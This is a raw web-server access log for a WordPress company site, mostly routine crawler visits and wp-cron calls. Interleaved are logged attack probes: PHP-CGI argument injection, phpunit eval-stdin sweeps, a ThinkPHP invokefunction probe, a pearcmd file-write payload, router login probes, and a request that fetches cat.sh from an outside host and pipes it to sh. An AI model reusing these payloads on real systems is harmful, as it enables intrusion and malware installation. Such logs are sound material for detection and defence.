157.55.39.203 - - [05/Jan/2026:03:09:33 +0800] "GET /wp-content/uploads/2025/07/1750005875-qizhou_map2025616.webp HTTP/1.1" 200 348798 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:03:28:55 +0800] "POST /wp-cron.php?doing_wp_cron=1767554935.0371770858764648437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
47.99.100.132 - - [05/Jan/2026:03:28:55 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
47.99.100.132 - - [05/Jan/2026:03:29:05 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
47.99.100.132 - - [05/Jan/2026:03:29:05 +0800] "GET /nmaplowercheck1767554940 HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.99.100.132 - - [05/Jan/2026:03:29:06 +0800] "POST /sdk HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.99.100.132 - - [05/Jan/2026:03:29:06 +0800] "GET /evox/about HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.99.100.132 - - [05/Jan/2026:03:29:06 +0800] "GET /HNAP1 HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.99.100.132 - - [05/Jan/2026:03:29:16 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
47.99.100.132 - - [05/Jan/2026:03:29:16 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [05/Jan/2026:03:32:45 +0800] "POST /wp-cron.php?doing_wp_cron=1767555165.9607639312744140625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
176.31.139.9 - - [05/Jan/2026:03:32:46 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
142.44.220.6 - - [05/Jan/2026:03:32:50 +0800] "GET /2373/ HTTP/1.1" 200 22603 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [05/Jan/2026:03:38:11 +0800] "POST /wp-cron.php?doing_wp_cron=1767555491.8640310764312744140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.249.68.70 - - [05/Jan/2026:03:38:12 +0800] "GET /2373/ HTTP/1.1" 200 22339 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [05/Jan/2026:03:46:46 +0800] "POST /wp-cron.php?doing_wp_cron=1767556006.0350730419158935546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
38.46.221.123 - - [05/Jan/2026:03:46:46 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [05/Jan/2026:03:46:46 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 34699 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:03:55:29 +0800] "POST /wp-cron.php?doing_wp_cron=1767556529.8230080604553222656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
130.12.180.18 - - [05/Jan/2026:03:55:30 +0800] "GET / HTTP/1.1" 200 34272 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
36.133.115.36 - - [05/Jan/2026:04:00:48 +0800] "POST /wp-cron.php?doing_wp_cron=1767556848.8021719455718994140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [05/Jan/2026:04:00:49 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Jan/2026:04:23:13 +0800] "POST /wp-cron.php?doing_wp_cron=1767558193.4724020957946777343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
159.89.113.86 - - [05/Jan/2026:04:23:13 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0"
43.131.36.84 - - [05/Jan/2026:04:23:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.131.36.84 - - [05/Jan/2026:04:23:20 +0800] "GET / HTTP/1.1" 200 34273 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
180.153.236.20 - - [05/Jan/2026:04:25:37 +0800] "GET / HTTP/1.1" 200 34699 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [05/Jan/2026:04:42:05 +0800] "POST /wp-cron.php?doing_wp_cron=1767559325.5617039203643798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.55.71 - - [05/Jan/2026:04:42:05 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0"
36.133.115.36 - - [05/Jan/2026:04:51:39 +0800] "POST /wp-cron.php?doing_wp_cron=1767559899.2345728874206542968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
79.133.126.39 - - [05/Jan/2026:04:51:39 +0800] "GET http://ip-api.com/json/ HTTP/1.1" 404 8982 "-" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:04:54:01 +0800] "POST /wp-cron.php?doing_wp_cron=1767560041.4989700317382812500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [05/Jan/2026:04:54:01 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Jan/2026:04:58:33 +0800] "POST /wp-cron.php?doing_wp_cron=1767560313.4767670631408691406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
142.44.220.184 - - [05/Jan/2026:04:58:33 +0800] "GET /news/page/2/ HTTP/1.1" 200 19333 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [05/Jan/2026:05:00:44 +0800] "POST /wp-cron.php?doing_wp_cron=1767560444.8658730983734130859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.80.130.124 - - [05/Jan/2026:05:00:44 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31364 "-" "libredtail-http"
36.133.115.36 - - [05/Jan/2026:05:00:46 +0800] "POST /wp-cron.php?doing_wp_cron=1767560446.5143110752105712890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.80.130.124 - - [05/Jan/2026:05:00:47 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 155928 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:48 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:48 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:49 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:49 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:50 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:50 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:51 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:51 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:52 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:52 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:53 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:53 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:54 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:54 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:55 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:55 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:56 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:56 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:57 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:57 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:58 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:59 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:00:59 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:00 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:00 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:01 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:01 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:02 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:02 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:03 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:03 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:04 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:04 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:05 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:06 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:06 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:06 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:08 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65604 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:09 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
116.179.32.168 - - [05/Jan/2026:05:01:10 +0800] "GET /industry/ HTTP/1.1" 200 22099 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
185.80.130.124 - - [05/Jan/2026:05:01:10 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 155928 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:13 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 155928 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:14 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
185.80.130.124 - - [05/Jan/2026:05:01:16 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
40.77.167.156 - - [05/Jan/2026:05:03:51 +0800] "GET /services/ HTTP/1.1" 200 31631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:05:17:00 +0800] "POST /wp-cron.php?doing_wp_cron=1767561420.8204300403594970703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
38.46.221.123 - - [05/Jan/2026:05:17:00 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [05/Jan/2026:05:17:01 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 34699 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:05:18:03 +0800] "POST /wp-cron.php?doing_wp_cron=1767561483.3126509189605712890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
34.79.180.31 - - [05/Jan/2026:05:18:03 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
36.133.115.36 - - [05/Jan/2026:05:19:37 +0800] "POST /wp-cron.php?doing_wp_cron=1767561577.0584490299224853515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
91.224.92.14 - - [05/Jan/2026:05:19:37 +0800] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 31364 "http://36.133.115.36:80/home.asp" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:05:28:30 +0800] "POST /wp-cron.php?doing_wp_cron=1767562110.0023539066314697265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
47.99.62.117 - - [05/Jan/2026:05:28:30 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
157.55.39.13 - - [05/Jan/2026:05:30:30 +0800] "GET /2373/ HTTP/1.1" 200 22623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:05:38:43 +0800] "POST /wp-cron.php?doing_wp_cron=1767562723.2642729282379150390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
123.187.240.242 - - [05/Jan/2026:05:38:43 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Jan/2026:05:38:47 +0800] "POST /wp-cron.php?doing_wp_cron=1767562727.6316230297088623046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
123.187.240.242 - - [05/Jan/2026:05:38:47 +0800] "GET / HTTP/1.1" 200 34272 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Jan/2026:05:41:19 +0800] "POST /wp-cron.php?doing_wp_cron=1767562879.4784541130065917968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
52.167.144.19 - - [05/Jan/2026:05:41:19 +0800] "GET /sitemap.xml HTTP/1.1" 200 492 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:06:04:59 +0800] "POST /wp-cron.php?doing_wp_cron=1767564299.8732399940490722656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
51.75.119.173 - - [05/Jan/2026:06:04:59 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.173 - - [05/Jan/2026:06:05:02 +0800] "GET /portfolio-tag/%E9%9E%8D%E9%92%A2%E8%92%82%E6%A3%AE/ HTTP/1.1" 404 8981 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.173 - - [05/Jan/2026:06:05:06 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 22081 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.173 - - [05/Jan/2026:06:05:08 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 22100 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [05/Jan/2026:06:13:13 +0800] "POST /wp-cron.php?doing_wp_cron=1767564793.6778070926666259765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
170.106.35.153 - - [05/Jan/2026:06:13:13 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
220.181.108.177 - - [05/Jan/2026:06:15:04 +0800] "GET /logistics/ HTTP/1.1" 200 29813 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.49 - - [05/Jan/2026:06:15:08 +0800] "GET /wp-content/uploads/2026/01/1767530151-qizhoutruck2.webp HTTP/1.1" 200 10876 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.160 - - [05/Jan/2026:06:15:08 +0800] "GET /wp-content/uploads/2025/11/1762864381-QZ_Photo-7.webp HTTP/1.1" 200 129922 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.199 - - [05/Jan/2026:06:15:08 +0800] "GET /wp-content/uploads/2026/01/1767530133-aojiaqiao20260102.webp HTTP/1.1" 200 97174 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1959.css?ver=1767539350" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.156 - - [05/Jan/2026:06:18:24 +0800] "GET /wp-content/uploads/logistics/Conatiner-5.webp HTTP/1.1" 200 63396 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [05/Jan/2026:06:25:25 +0800] "POST /wp-cron.php?doing_wp_cron=1767565525.8416540622711181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
91.224.92.14 - - [05/Jan/2026:06:25:25 +0800] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 31364 "http://36.133.115.36:80/home.asp" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:06:41:04 +0800] "POST /wp-cron.php?doing_wp_cron=1767566464.2591578960418701171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [05/Jan/2026:06:41:04 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Jan/2026:06:48:58 +0800] "POST /wp-cron.php?doing_wp_cron=1767566938.4488160610198974609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
130.12.180.18 - - [05/Jan/2026:06:48:58 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 8981 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
36.133.115.36 - - [05/Jan/2026:06:57:33 +0800] "POST /wp-cron.php?doing_wp_cron=1767567453.0647330284118652343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
38.46.221.123 - - [05/Jan/2026:06:57:33 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [05/Jan/2026:06:57:33 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 34699 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [05/Jan/2026:07:00:25 +0800] "POST /wp-cron.php?doing_wp_cron=1767567625.1548700332641601562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
110.249.202.59 - - [05/Jan/2026:07:00:25 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [05/Jan/2026:07:03:34 +0800] "POST /wp-cron.php?doing_wp_cron=1767567814.0661089420318603515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
130.12.180.18 - - [05/Jan/2026:07:03:34 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=rm%20-rf%20cat.sh%3Bcd%20%2Ftmp%3B%20wget%20http%3A%2F%2F130.12.180.20:36695%2Fcat.sh%20-O-%20%7C%20sh%3B%20curl%20-O%20http%3A%2F%2F130.12.180.20:36695%2Fcat.sh%3B%20chmod%20777%20cat.sh%3B%20sh%20cat.sh HTTP/1.1" 404 8982 "-" "Mozila/5.0"
36.133.108.125 - - [05/Jan/2026:07:08:47 +0800] "HEAD /login.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0"
36.133.115.36 - - [05/Jan/2026:07:17:39 +0800] "POST /wp-cron.php?doing_wp_cron=1767568659.4106531143188476562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.119 - - [05/Jan/2026:07:17:39 +0800] "HEAD /CFIDE/componentutils/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
36.133.115.36 - - [05/Jan/2026:07:25:24 +0800] "POST /wp-cron.php?doing_wp_cron=1767569124.7983250617980957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
51.68.235.38 - - [05/Jan/2026:07:25:24 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.235.38 - - [05/Jan/2026:07:25:26 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 22101 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [05/Jan/2026:07:35:54 +0800] "POST /wp-cron.php?doing_wp_cron=1767569753.9719710350036621093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [05/Jan/2026:07:35:54 +0800] "GET / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Jan/2026:07:37:40 +0800] "POST /wp-cron.php?doing_wp_cron=1767569860.2319951057434082031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
27.28.40.138 - - [05/Jan/2026:07:37:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 7.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1843.88 Safari/537.36"
27.28.40.138 - - [05/Jan/2026:07:37:40 +0800] "GET / HTTP/1.1" 200 34699 "-" "Mozilla/5.0 (Windows NT 7.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1843.88 Safari/537.36"
27.28.40.138 - - [05/Jan/2026:07:37:40 +0800] "GET /contacts/ HTTP/1.1" 200 21722 "-" "Mozilla/5.0 (Windows NT 10.6; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3654.88 Safari/537.36"
36.133.115.36 - - [05/Jan/2026:07:39:55 +0800] "POST /wp-cron.php?doing_wp_cron=1767569995.1238389015197753906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [05/Jan/2026:07:39:56 +0800] "POST / HTTP/1.1" 200 34273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [05/Jan/2026:07:55:14 +0800] "POST /wp-cron.php?doing_wp_cron=1767570914.9511830806732177734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
